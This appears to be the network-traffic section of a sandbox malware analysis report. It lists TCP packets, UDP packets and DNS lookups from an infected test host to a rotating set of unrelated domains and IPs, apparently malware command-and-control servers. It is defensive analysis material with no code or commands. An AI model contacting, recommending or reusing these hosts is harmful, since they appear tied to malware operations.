                                                                                                                                              Oct 4, 2024 08:12:06.368134022 CEST804980654.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:06.368371964 CEST4980680192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:06.376060009 CEST4980680192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:06.376108885 CEST4980680192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:06.376157999 CEST4980680192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:06.529606104 CEST804980654.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:06.529735088 CEST804980654.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:06.530628920 CEST804980654.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:06.530733109 CEST804980654.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:06.530850887 CEST4980680192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:07.884315968 CEST4980680192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:08.901731968 CEST4980780192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:09.055936098 CEST804980754.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:09.056077957 CEST4980780192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:09.061167955 CEST4980780192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:09.216344118 CEST804980754.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:09.216747999 CEST804980754.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:09.216846943 CEST804980754.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:09.217163086 CEST4980780192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:09.219048977 CEST4980780192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:09.372474909 CEST804980754.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:14.228997946 CEST4980880192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:12:14.464935064 CEST8049808194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:14.465214014 CEST4980880192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:12:14.472788095 CEST4980880192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:12:14.709829092 CEST8049808194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:14.709954023 CEST8049808194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:14.709995985 CEST8049808194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:14.710009098 CEST8049808194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:14.710020065 CEST8049808194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:14.710122108 CEST4980880192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:12:14.710164070 CEST4980880192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:12:14.710164070 CEST4980880192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:12:15.976226091 CEST4980880192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:12:16.999311924 CEST4980980192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:12:17.223392963 CEST8049809194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:17.223623991 CEST4980980192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:12:17.231177092 CEST4980980192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:12:17.455576897 CEST8049809194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:17.456372023 CEST8049809194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:17.456393957 CEST8049809194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:17.456403971 CEST8049809194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:17.456415892 CEST8049809194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:17.456583023 CEST4980980192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:12:17.456583023 CEST4980980192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:12:18.741193056 CEST4980980192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:12:19.762270927 CEST4981080192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:12:19.988928080 CEST8049810194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:19.989070892 CEST4981080192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:12:19.996772051 CEST4981080192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:12:19.996820927 CEST4981080192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:12:20.227132082 CEST8049810194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:20.227144003 CEST8049810194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:20.227152109 CEST8049810194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:20.227186918 CEST8049810194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:20.227200031 CEST8049810194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:20.227231979 CEST8049810194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:20.227272034 CEST8049810194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:20.227339029 CEST4981080192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:12:20.227555037 CEST4981080192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:12:20.463062048 CEST8049810194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:20.463074923 CEST8049810194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:20.463224888 CEST4981080192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:12:21.506211042 CEST4981080192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:12:22.523699999 CEST4981180192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:12:22.749691963 CEST8049811194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:22.749880075 CEST4981180192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:12:22.754941940 CEST4981180192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:12:22.980804920 CEST8049811194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:22.981142998 CEST8049811194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:22.981209040 CEST8049811194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:22.981224060 CEST8049811194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:22.981236935 CEST8049811194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:22.981257915 CEST8049811194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:22.981309891 CEST8049811194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:22.981354952 CEST8049811194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:22.981374979 CEST8049811194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:22.981386900 CEST8049811194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:22.981411934 CEST4981180192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:12:22.981411934 CEST4981180192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:12:22.981509924 CEST4981180192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:12:22.981829882 CEST4981180192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:12:22.984102964 CEST4981180192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:12:23.210135937 CEST8049811194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:27.991568089 CEST4981280192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:12:28.286031961 CEST804981238.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:28.286226034 CEST4981280192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:12:28.294442892 CEST4981280192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:12:28.588924885 CEST804981238.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:28.589133978 CEST804981238.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:28.589145899 CEST804981238.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:28.589435101 CEST4981280192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:12:29.801285028 CEST4981280192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:12:30.819948912 CEST4981380192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:12:31.114577055 CEST804981338.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:31.114738941 CEST4981380192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:12:31.122299910 CEST4981380192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:12:31.423765898 CEST804981338.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:31.423966885 CEST804981338.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:31.423979044 CEST804981338.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:31.424115896 CEST4981380192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:12:32.628784895 CEST4981380192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:12:33.647789955 CEST4981480192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:12:33.944453001 CEST804981438.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:33.944603920 CEST4981480192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:12:33.952368975 CEST4981480192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:12:33.952416897 CEST4981480192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:12:33.952476025 CEST4981480192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:12:34.256562948 CEST804981438.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:34.256684065 CEST804981438.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:34.256735086 CEST804981438.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:34.256958008 CEST804981438.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:34.257328033 CEST804981438.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:34.257339001 CEST804981438.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:34.257482052 CEST4981480192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:12:35.456286907 CEST4981480192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:12:36.473936081 CEST4981580192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:12:36.781797886 CEST804981538.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:36.781939030 CEST4981580192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:12:36.788305998 CEST4981580192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:12:37.093763113 CEST804981538.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:37.093775988 CEST804981538.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:37.093813896 CEST804981538.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:37.094000101 CEST4981580192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:12:37.095935106 CEST4981580192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:12:37.390445948 CEST804981538.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:42.113308907 CEST4981680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:12:42.213026047 CEST80498163.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:42.213164091 CEST4981680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:12:42.221555948 CEST4981680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:12:42.321419954 CEST80498163.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:42.323299885 CEST80498163.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:42.323419094 CEST4981680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:12:43.735671997 CEST4981680192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:12:43.835474014 CEST80498163.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:44.753339052 CEST4981780192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:12:44.853329897 CEST80498173.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:44.853593111 CEST4981780192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:12:44.861121893 CEST4981780192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:12:44.960844994 CEST80498173.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:44.962908983 CEST80498173.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:44.963088036 CEST4981780192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:12:46.375714064 CEST4981780192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:12:46.475563049 CEST80498173.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:47.395131111 CEST4981880192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:12:47.494280100 CEST80498183.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:47.494467020 CEST4981880192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:12:47.502202988 CEST4981880192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:12:47.502250910 CEST4981880192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:12:47.601589918 CEST80498183.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:47.601682901 CEST80498183.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:47.601809978 CEST80498183.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:47.601944923 CEST80498183.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:47.601953983 CEST80498183.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:47.601979017 CEST80498183.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:47.601989031 CEST80498183.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:47.605252028 CEST80498183.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:47.605353117 CEST4981880192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:12:49.015799999 CEST4981880192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:12:49.115068913 CEST80498183.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:50.033214092 CEST4981980192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:12:50.132504940 CEST80498193.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:50.132615089 CEST4981980192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:12:50.137732983 CEST4981980192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:12:50.236812115 CEST80498193.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:50.239214897 CEST80498193.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:50.239226103 CEST80498193.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:50.239495039 CEST4981980192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:12:50.241365910 CEST4981980192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:12:50.247097015 CEST80498193.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:50.247262955 CEST4981980192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:12:50.340487957 CEST80498193.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:55.250869036 CEST4982080192.168.11.20162.213.249.216
                                                                                                                                              Oct 4, 2024 08:12:55.409480095 CEST8049820162.213.249.216192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:55.409648895 CEST4982080192.168.11.20162.213.249.216
                                                                                                                                              Oct 4, 2024 08:12:55.417207956 CEST4982080192.168.11.20162.213.249.216
                                                                                                                                              Oct 4, 2024 08:12:55.577344894 CEST8049820162.213.249.216192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:55.601840019 CEST8049820162.213.249.216192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:55.601939917 CEST8049820162.213.249.216192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:55.602098942 CEST4982080192.168.11.20162.213.249.216
                                                                                                                                              Oct 4, 2024 08:12:56.920314074 CEST4982080192.168.11.20162.213.249.216
                                                                                                                                              Oct 4, 2024 08:12:57.937720060 CEST4982180192.168.11.20162.213.249.216
                                                                                                                                              Oct 4, 2024 08:12:58.095555067 CEST8049821162.213.249.216192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:58.095726013 CEST4982180192.168.11.20162.213.249.216
                                                                                                                                              Oct 4, 2024 08:12:58.103259087 CEST4982180192.168.11.20162.213.249.216
                                                                                                                                              Oct 4, 2024 08:12:58.260736942 CEST8049821162.213.249.216192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:58.275003910 CEST8049821162.213.249.216192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:58.275015116 CEST8049821162.213.249.216192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:58.275186062 CEST4982180192.168.11.20162.213.249.216
                                                                                                                                              Oct 4, 2024 08:12:59.607203007 CEST4982180192.168.11.20162.213.249.216
                                                                                                                                              Oct 4, 2024 08:13:00.625099897 CEST4982280192.168.11.20162.213.249.216
                                                                                                                                              Oct 4, 2024 08:13:00.784123898 CEST8049822162.213.249.216192.168.11.20
                                                                                                                                              Oct 4, 2024 08:13:00.784331083 CEST4982280192.168.11.20162.213.249.216
                                                                                                                                              Oct 4, 2024 08:13:00.794446945 CEST4982280192.168.11.20162.213.249.216
                                                                                                                                              Oct 4, 2024 08:13:00.794466972 CEST4982280192.168.11.20162.213.249.216
                                                                                                                                              Oct 4, 2024 08:13:00.952332020 CEST8049822162.213.249.216192.168.11.20
                                                                                                                                              Oct 4, 2024 08:13:00.952344894 CEST8049822162.213.249.216192.168.11.20
                                                                                                                                              Oct 4, 2024 08:13:00.952549934 CEST8049822162.213.249.216192.168.11.20
                                                                                                                                              Oct 4, 2024 08:13:00.952790976 CEST8049822162.213.249.216192.168.11.20
                                                                                                                                              Oct 4, 2024 08:13:00.993580103 CEST8049822162.213.249.216192.168.11.20
                                                                                                                                              Oct 4, 2024 08:13:00.993711948 CEST8049822162.213.249.216192.168.11.20
                                                                                                                                              Oct 4, 2024 08:13:00.993932009 CEST4982280192.168.11.20162.213.249.216
                                                                                                                                              Oct 4, 2024 08:13:02.310061932 CEST4982280192.168.11.20162.213.249.216
                                                                                                                                              Oct 4, 2024 08:13:03.327112913 CEST4982380192.168.11.20162.213.249.216
                                                                                                                                              Oct 4, 2024 08:13:03.485111952 CEST8049823162.213.249.216192.168.11.20
                                                                                                                                              Oct 4, 2024 08:13:03.485276937 CEST4982380192.168.11.20162.213.249.216
                                                                                                                                              Oct 4, 2024 08:13:03.490326881 CEST4982380192.168.11.20162.213.249.216
                                                                                                                                              Oct 4, 2024 08:13:03.647815943 CEST8049823162.213.249.216192.168.11.20
                                                                                                                                              Oct 4, 2024 08:13:03.685246944 CEST8049823162.213.249.216192.168.11.20
                                                                                                                                              Oct 4, 2024 08:13:03.685260057 CEST8049823162.213.249.216192.168.11.20
                                                                                                                                              Oct 4, 2024 08:13:03.685558081 CEST4982380192.168.11.20162.213.249.216
                                                                                                                                              Oct 4, 2024 08:13:03.687469006 CEST4982380192.168.11.20162.213.249.216
                                                                                                                                              Oct 4, 2024 08:13:03.844993114 CEST8049823162.213.249.216192.168.11.20

                                                                                                                                              UDP Packets

                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Oct 4, 2024 08:06:03.924762011 CEST5435553192.168.11.201.1.1.1
                                                                                                                                              Oct 4, 2024 08:06:04.324286938 CEST53543551.1.1.1192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:37.356482983 CEST5575053192.168.11.201.1.1.1
                                                                                                                                              Oct 4, 2024 08:06:37.607892036 CEST53557501.1.1.1192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:03.688368082 CEST5928453192.168.11.201.1.1.1
                                                                                                                                              Oct 4, 2024 08:07:03.806294918 CEST53592841.1.1.1192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:19.075211048 CEST5285453192.168.11.201.1.1.1
                                                                                                                                              Oct 4, 2024 08:07:19.250932932 CEST53528541.1.1.1192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:32.384788990 CEST6257553192.168.11.201.1.1.1
                                                                                                                                              Oct 4, 2024 08:07:32.500068903 CEST53625751.1.1.1192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:45.647533894 CEST5425953192.168.11.201.1.1.1
                                                                                                                                              Oct 4, 2024 08:07:45.845398903 CEST53542591.1.1.1192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:58.973030090 CEST5876453192.168.11.201.1.1.1
                                                                                                                                              Oct 4, 2024 08:07:59.225184917 CEST53587641.1.1.1192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:12.610373974 CEST5362553192.168.11.201.1.1.1
                                                                                                                                              Oct 4, 2024 08:08:12.953572035 CEST53536251.1.1.1192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:26.810334921 CEST5335753192.168.11.201.1.1.1
                                                                                                                                              Oct 4, 2024 08:08:26.914175987 CEST53533571.1.1.1192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:41.151598930 CEST6149153192.168.11.201.1.1.1
                                                                                                                                              Oct 4, 2024 08:08:41.326567888 CEST53614911.1.1.1192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:54.460899115 CEST5934753192.168.11.201.1.1.1
                                                                                                                                              Oct 4, 2024 08:08:54.606975079 CEST53593471.1.1.1192.168.11.20
                                                                                                                                              Oct 4, 2024 08:09:08.082489967 CEST5075653192.168.11.201.1.1.1
                                                                                                                                              Oct 4, 2024 08:09:08.186542988 CEST53507561.1.1.1192.168.11.20
                                                                                                                                              Oct 4, 2024 08:09:21.315855026 CEST5822053192.168.11.201.1.1.1
                                                                                                                                              Oct 4, 2024 08:09:21.420059919 CEST53582201.1.1.1192.168.11.20
                                                                                                                                              Oct 4, 2024 08:09:41.606288910 CEST6338153192.168.11.201.1.1.1
                                                                                                                                              Oct 4, 2024 08:09:41.716272116 CEST53633811.1.1.1192.168.11.20
                                                                                                                                              Oct 4, 2024 08:09:56.212505102 CEST5978553192.168.11.201.1.1.1
                                                                                                                                              Oct 4, 2024 08:09:57.225722075 CEST5978553192.168.11.209.9.9.9
                                                                                                                                              Oct 4, 2024 08:09:57.306046963 CEST53597851.1.1.1192.168.11.20
                                                                                                                                              Oct 4, 2024 08:09:57.687583923 CEST53597859.9.9.9192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:11.318619013 CEST4987553192.168.11.201.1.1.1
                                                                                                                                              Oct 4, 2024 08:10:11.433711052 CEST53498751.1.1.1192.168.11.20
                                                                                                                                              Oct 4, 2024 08:10:24.987787962 CEST5306553192.168.11.201.1.1.1
                                                                                                                                              Oct 4, 2024 08:10:25.093424082 CEST53530651.1.1.1192.168.11.20

                                                                                                                                              DNS Queries

                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                              Oct 4, 2024 08:06:03.924762011 CEST192.168.11.201.1.1.10x5807Standard query (0)fredy.eeA (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:06:37.356482983 CEST192.168.11.201.1.1.10xb64fStandard query (0)www.inastra.onlineA (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:07:03.688368082 CEST192.168.11.201.1.1.10x774bStandard query (0)www.invicta.worldA (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:07:19.075211048 CEST192.168.11.201.1.1.10xadacStandard query (0)www.whats-in-the-box.orgA (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:07:32.384788990 CEST192.168.11.201.1.1.10x652bStandard query (0)www.linkwave.cloudA (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:07:45.647533894 CEST192.168.11.201.1.1.10x4869Standard query (0)www.dfmagazine.shopA (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:07:58.973030090 CEST192.168.11.201.1.1.10xdafcStandard query (0)www.ngmr.xyzA (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:08:12.610373974 CEST192.168.11.201.1.1.10x2f70Standard query (0)www.albero-dveri.onlineA (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:08:26.810334921 CEST192.168.11.201.1.1.10xfff2Standard query (0)www.typ67.topA (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:08:41.151598930 CEST192.168.11.201.1.1.10xc919Standard query (0)www.greekhause.orgA (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:08:54.460899115 CEST192.168.11.201.1.1.10x9fa5Standard query (0)www.dorikis.onlineA (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:09:08.082489967 CEST192.168.11.201.1.1.10xd15bStandard query (0)www.platinumkitchens.infoA (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:09:21.315855026 CEST192.168.11.201.1.1.10xae86Standard query (0)www.dhkatp.vipA (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:09:41.606288910 CEST192.168.11.201.1.1.10x4ef0Standard query (0)www.tempatmudisini01.clickA (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:09:56.212505102 CEST192.168.11.201.1.1.10x4233Standard query (0)www.komart.shopA (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:09:57.225722075 CEST192.168.11.209.9.9.90x4233Standard query (0)www.komart.shopA (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:10:11.318619013 CEST192.168.11.201.1.1.10xf190Standard query (0)www.dxeg.lolA (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:10:24.987787962 CEST192.168.11.201.1.1.10xd63eStandard query (0)www.tukaari.shopA (IP address)IN (0x0001)false

                                                                                                                                              DNS Answers

                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                              Oct 4, 2024 08:06:04.324286938 CEST1.1.1.1192.168.11.200x5807No error (0)fredy.ee185.86.211.136A (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:06:37.607892036 CEST1.1.1.1192.168.11.200xb64fNo error (0)www.inastra.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:07:03.806294918 CEST1.1.1.1192.168.11.200x774bNo error (0)www.invicta.world13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:07:03.806294918 CEST1.1.1.1192.168.11.200x774bNo error (0)www.invicta.world76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:07:19.250932932 CEST1.1.1.1192.168.11.200xadacNo error (0)www.whats-in-the-box.orgwhats-in-the-box.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:07:19.250932932 CEST1.1.1.1192.168.11.200xadacNo error (0)whats-in-the-box.org3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:07:19.250932932 CEST1.1.1.1192.168.11.200xadacNo error (0)whats-in-the-box.org15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:07:32.500068903 CEST1.1.1.1192.168.11.200x652bNo error (0)www.linkwave.cloudlinkwave.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:07:32.500068903 CEST1.1.1.1192.168.11.200x652bNo error (0)linkwave.cloud3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:07:32.500068903 CEST1.1.1.1192.168.11.200x652bNo error (0)linkwave.cloud15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:07:45.845398903 CEST1.1.1.1192.168.11.200x4869No error (0)www.dfmagazine.shopdfmagazine.shopCNAME (Canonical name)IN (0x0001)false
